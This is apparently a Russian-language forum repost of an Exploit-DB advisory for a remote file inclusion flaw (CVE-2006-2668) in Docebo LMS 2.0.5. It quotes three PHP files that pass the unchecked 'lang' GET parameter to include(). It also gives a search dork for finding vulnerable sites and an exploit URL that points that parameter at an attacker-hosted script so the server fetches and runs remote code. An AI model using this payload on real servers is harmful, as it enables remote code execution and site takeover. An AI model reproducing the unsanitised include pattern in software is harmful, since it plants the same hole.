Exploit DoceboLms 2.0.5 - 'help.php' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1828
Проверка EDB
  1. Пройдено
Автор
BEFORD
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-2668
Дата публикации
2006-05-25
Код:
Vulnerable Script: Docebo LMS 2.05
Discovered: beford <xbefordx gmail com>

Noobs: %22Based+on+DoceboLMS+2.0%22

Vulnerable Files

doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');

http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/?

# milw0rm.com [2006-05-25]
 
Источник
www.exploit-db.com

Похожие темы